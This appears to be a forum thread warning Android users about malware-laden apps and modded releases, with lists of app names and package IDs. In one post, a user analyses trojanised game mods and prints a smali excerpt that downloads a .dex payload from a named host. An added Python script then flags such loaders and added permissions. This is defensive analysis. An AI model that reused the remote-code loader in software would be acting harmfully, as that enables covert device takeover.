Keep yourself informed!
Sep 10th, 2019, 3:05 pm
Alert for new malware detected installed in dozens of applications in the Android Play Store has hit the security company CSIS.
Specifically, the company found that the Joker software is hidden in these applications, which is extremely insidious and ... costly.
Joker secretly signs application users up for subscription services, so users pay for services they don't use.
Google dumped the infected apps out of the Play Store, but any users who downloaded them should do so right away.

Advocate Wallpaper
Age Face
Altar Message
Antivirus Security - Security Scan
Beach Camera
Board picture editing
Certain Wallpaper
Climate SMS
Collate Face Scanner
Cute Camera
Dazzle Wallpaper
Declare Message
Display Camera
Great VPN
Humour Camera
Ignite Clean
Leaf Face Scanner
Mini Camera
Print Plant scan
Rapid Face Scanner
Reward Clean
Ruddy SMS
Soby Camera
Spark Wallpaper

Extra apps that have been reported that are loaded with adware:

CM Security Applock AntiVirus
Free VPN Master
Funny Sweet Beauty Selfie Camera
HotSpotVPN
Secure VPN
Sun Pro Beauty Camera

Updated 20/7/2022:

Coco Camera v1.1 (com.toomore.cool.camera)
Creative 3D Launcher (app.launcher.creative3d)
Freeglow Camera 1.0.0 (com.glow.camera.open)
Funny Camera (com.okcamera.funny)
Gif Emoji Keyboard (com.gif.emoji.keyboard)
Razer Keyboard & Theme (com.razer.keyboards) not related to the gaming/tech company Razer
Vlog Star Video Editor (com.vlog.star.video.editor)
Wow Beauty Camera (com.wowbeauty.camera)

Updated 27/7/2022

@Jaggu's Mods - Spyware
Releases modded by Jaggu (who is not a releaser on Mobilism) come with spyware capable of stealing sensitive information.

Deezer
TikTok (Unlocked)(In-Built Region Changer)(NoPlugin Need)(Mod)
Remini [Pro]
Reface: Funny face swap videos (Pro)
Spotify [Amoled Mod]
Infinite Painter (Premium)
Gaana Hindi Song Music App [Plus][Mod]
Swift Backup [Premium]
Fluid Simulation [Patched]
Truecaller: Caller ID & Block [Gold]
ExpressVPN - #1 Trusted VPN (Patched)
Alarmy, Challenge Alarm clock [PREMIUM]
CREX - Cricket Exchange [Premium]
Flashcards World [Premium]
Download Accelerator Plus [Premium]
Hidden Eye - intruder selfie [Premium]

Updated 9/12/2022

TubeBox (jiajiamaji) – 1,000,000 downloads
Bluetooth device auto connect (bt auto connect group) – 1,000,000 downloads
Bluetooth & Wi-Fi & USB driver (simple things for everyone) – 100,000 downloads
Volume, Music Equalizer (bt autoconnect group) – 50,000 downloads
Fast Cleaner & Cooling Master (Hippo VPN LLC) – 500 downloads

Before make a new topic please:
- Read the Site Rules and How to Post a Release
- Use Search Bar for avoid double posts.
- Support developers!
- For PC and Android widgets - Animated Wallpapers check my Deviantart
Sep 21st, 2019, 8:02 pm
Add to that list:
HotSpotVPN
Free VPN Master
Secure VPN
CM Security Applock AntiVirus
Sun Pro Beauty Camera
Funny Sweet Beauty Selfie Camera
Loaded with adware.

"Snowflake" is a derogatory slang term for a person who has an unwarranted sense of entitlement or are overly-emotional, easily offended, and unable to deal with opposing opinions.
Sep 25th, 2019, 3:38 pm
I'm glad that I don't install any of this :shock:
Nov 14th, 2019, 2:31 pm
I was using ai.type keyboard Plus + Emoji for some time :shock: :shock:
Checking my phone rn...
Thank you for the article
Jan 10th, 2020, 1:28 pm
Lucky, I don't have any of those apps installed.
Feb 2nd, 2020, 11:24 pm
Malwarebytes has a good front end to detect this stuff at download and again at install. Saved my arse many a time...

... knowledge is the thesis of rebellion!
Aug 14th, 2020, 11:59 am
Today the Tik Tok app has been banned and removed from iOS and Android (Playstore) for security reasons: So be aware!
Today's article from a trusted source:
With the US accusing TikTok of spying on American citizens and TikTok itself denying any involvement with the Chinese government, a new investigation is coming to make the company's position even more difficult. According to the Wall Street Journal, TikTok tracked the MAC addresses of Android users by the end of last year.
Unlike cookies which can be easily deleted, MAC addresses are unique to each device and are often used in digital advertising to identify devices. TikTok reportedly took advantage of a known Android security vulnerability and stored MAC addresses for at least 15 months. It even used an extra level of encryption to hide this collection.
This data was collected, of course, without the user's consent, in clear violation of Google's terms of use. A Google spokesman said the company was investigating the Journal's findings, but did not comment on the security breach that allowed applications to collect MAC addresses.
TikTok, in turn, did not deny the allegations or answer specific questions and instead issued the following statement stating that the application no longer uses such tactics.
Apr 12th, 2021, 11:28 am
Info by @ill420smoker

Hey guys,

I've noticed a dangerous trend in our Android section in the last few months and wanted to share my findings.

While viewing the Android>Games section I would often see the following:
- A brand new user
-- posting perfect topics
-- posting attractive titles
-- posting a few topics in succession
-- never returning to the forum

Of course this immediately sends up a red flag to me.

Upon downloading and inspecting a few of these apps I've noticed there are added .smali files (aka Java classes), which is another red flag. At first I believed this was only ad injection, but it turns out to be much worse.

Take this topic for example:
Idle Miner Tycoon v3.42.0 (Mod Money)
https://forum.mobilism.org/viewtopic.php?f=408&t=4225643

APK:
https://sharemods.com/3ybom9202awx/idle_miner_mod_3.42.0.apk.html

The source of the original mod is AN1.com, and while AN1 does inject their games with adware to profit from their mods this is much more dangerous.

Notable changes:
- Changed startup activity
- Added permissions to Manifest:
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.START_TASKS_FROM_RECENTS"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.REAL_GET_TASKS"/>
<uses-permission android:name="android.permission.REORDER_TASKS"/>
<uses-permission android:name="android.permission.GET_DETAILED_TASKS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>

The new startup activity downloads another .dex file from the internet:
Code:
.method protected varargs a([Ljava/lang/Void;)Ljava/lang/Object;
    .locals 6

    :try_start_0
    new-instance p1, Ljava/net/URL;

    const-string v0, "https://dexapt.com/a/2021-04-11.dex"

    invoke-direct {p1, v0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V

    invoke-virtual {p1}, Ljava/net/URL;->openStream()Ljava/io/InputStream;
...

The website 'dexapt.com' has recently changed from a superficial tech and news website to an app & game site. If you follow the link to https://dexapt.com/a/ you'll see the various .dex files hosted here. Notice the coded .dex file has not been posted yet. This allows the app to run inconspicuously until they do post it. As some users have reported, Chrome will launch weird webpages after running these apps.

Once the .dex (8k) is available and downloaded it will also download a .dex file (20k) which contains the Metasploit code. After the Metasploit framework is installed, an attacker can remotely execute the following :!:
Image

Moreover, the VirusTotal report for these infected apps/games is clean:
https://www.virustotal.com/gui/file/30b ... af/details
(Notice it's already spread to a2zapk.com)

Metasploit is likely the worst possible malware that a user can be infected with.

An additional search term:
DexClassLoader

I uploaded '2021-03-25.dex' to VT. The two interesting strings are the short links that are launched by Chrome.
https://www.virustotal.com/gui/file/80d ... /detection

- ill420smoker
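
An added example, not part of ill420smoker's post or any project's code: a triage script for the two checks the post describes, permissions added to the manifest and a startup class that fetches a .dex and loads it. It assumes the original and repackaged APKs have been decoded (for instance with apktool); the sample manifests, smali and the example.invalid host are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# const-string holding a URL that points at a loadable code container
REMOTE_CODE_URL = re.compile(
    r'const-string(?:/jumbo)?\s+\w+,\s*"(https?://[^"\s]+\.(?:dex|jar|apk))"', re.I)
# class loaders able to run code that was fetched after install
LOADERS = ("Ldalvik/system/DexClassLoader;",
           "Ldalvik/system/InMemoryDexClassLoader;")

def permissions(manifest_xml):
    """Set of <uses-permission> names in a decoded AndroidManifest.xml string."""
    root = ET.fromstring(manifest_xml)
    return {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}

def added_permissions(original_xml, repacked_xml):
    """Permissions that appear only in the repackaged build."""
    return sorted(permissions(repacked_xml) - permissions(original_xml))

def scan_smali(text):
    """Remote-code URLs and dynamic class loaders found in one smali file."""
    return {"urls": REMOTE_CODE_URL.findall(text),
            "loaders": [name for name in LOADERS if name in text]}

def scan_tree(decoded_dir):
    """Scan every .smali file under a decoded APK directory."""
    hits = {}
    for path in sorted(Path(decoded_dir).rglob("*.smali")):
        result = scan_smali(path.read_text(errors="replace"))
        if result["urls"] or result["loaders"]:
            hits[str(path.relative_to(decoded_dir))] = result
    return hits

# Constructed sample input (placeholder host, not taken from any real app)
HEAD = '<manifest xmlns:android="http://schemas.android.com/apk/res/android">'
PERM = '<uses-permission android:name="android.permission.{}"/>'
SAMPLE_ORIGINAL = HEAD + PERM.format("INTERNET") + "</manifest>"
SAMPLE_REPACKED = HEAD + "".join(PERM.format(p) for p in (
    "INTERNET", "GET_TASKS", "RECEIVE_BOOT_COMPLETED", "WRITE_SETTINGS")) + "</manifest>"
SAMPLE_SMALI = '''
    const-string v0, "https://example.invalid/a/payload.dex"
    invoke-direct {p1, v0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
    new-instance v1, Ldalvik/system/DexClassLoader;
'''

if __name__ == "__main__":
    print(added_permissions(SAMPLE_ORIGINAL, SAMPLE_REPACKED))
    print(scan_smali(SAMPLE_SMALI))
```

A hit is a reason to inspect the file by hand, not a verdict: legitimate apps also use DexClassLoader, and a clean scan does not rule out a loader hidden behind string obfuscation.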

Jul 19th, 2021, 4:33 pm
Info by @(GL)Nihon

It has come to my attention that some people might get some *false positive* warnings while using Huawei devices

As seen: https://forum.mobilism.org/viewtopic.php?f=430&t=4249177&p=8793638#p8793638

See picture:

https://imgur.com/a/rxLox27

Searching through the net that report APK:RepSandbox[trj]||ar

https://www.virustotal.com/gui/file/cfd ... /detection

Well need to look into this

Reports from Huawei:

Meanwhile Huawei really do not give much of an answer except:
Hi fuchs.sigma, thank you for reaching Huawei! we do apologized for any inconvenience caused to you. Accessing unauthorized ads or links may infect your device with Trojans and malware that may secretly install themselves and steal your personal data. Running a virus scan can locate and remove potential threats on your Phone. Therefore, we would suggest to use Phone Manager to scan virus.


And some other sort of direction to pm them rather than giving them any real indication why the app is flagged..

So if you're unsure of using the app uninstall it and wait for another version.

But in the other have even tasker have gotten the app as flagged
Jul 19th, 2021, 5:43 pm
To further add the app itself is clean (intermediate)

See https://www.virustotal.com/gui/file/56c ... 7d/summary
Human Japanese

https://www.virustotal.com/gui/file/d8a ... 57/summary

But the user uploads have more warnings which aren't from the original apk

Please do note that the red flag is only due to debug/test keys

Welcome to the world Nihon Jr 2016-10-15 08.39pm <3

Currently a bit of here. Sorry
Dec 1st, 2021, 11:35 am
Last News

These are the applications that infected 300,000 Android by stealing money

According to a new report posted a few hours ago by ThreatFabric researchers, more than 300,000 Android users have installed infected applications from Google Play, which included malware that was intended to steal money.

Now you wonder how they managed to get through Google security? These applications are mainly QR Readers and PDF Scanners and do the job well they initially promised. However, through updates or with a code that comes down after the first execution, they turn into banking Trojans that try behind the scenes to extract log-in codes, bank details, e-mails or cryptocurrencies.

The following is a list of the applications in question that security researchers have identified as dangerous, along with their package names:

CryptoTracker - cryptolistapp.app.com.cryptotracker
Gym and Fitness Trainer - com.gym.trainer.jeux
Master Scanner Live - com.multifuction.combine.qr
PDF Document Scanner - com.docscanverifier.mobile
PDF Document Scanner Free - com.doscanner.mobile
PDF Document Scanner - Scan to PDF - com.xaviermuches.docscannerpro2
Protection Guard - com.protectionguard.app
QR CreatorScanner - com.ready.qrscanner.mix
QR Scanner - com.qr.barqr.scangen
QR Scanner 2021 - com.qr.code.generate
Two Factor Authenticator - com.flowdivison

It is worth noting that in Android many applications have the same name, so even if something on the list reminds you, you do not need to panic. What we suggest is to check the unique ID of the application (package name). To see this you need to visit the relevant section of your device settings. Of course, if the package name is not visible there, as is the case with Samsung smartphones, you can check with a third-party Package Name Viewer application.

If you have one of the above applications installed, we suggest that you immediately change the passwords to email accounts, subscription services that you have on your mobile and may have your card, such as Netflix, as well as your e-banking codes, if you have banking applications installed.

Finally, it should be noted that these applications now seem to have been withdrawn from Google Play, which despite the twists and turns remains the safest way to obtain applications for the software.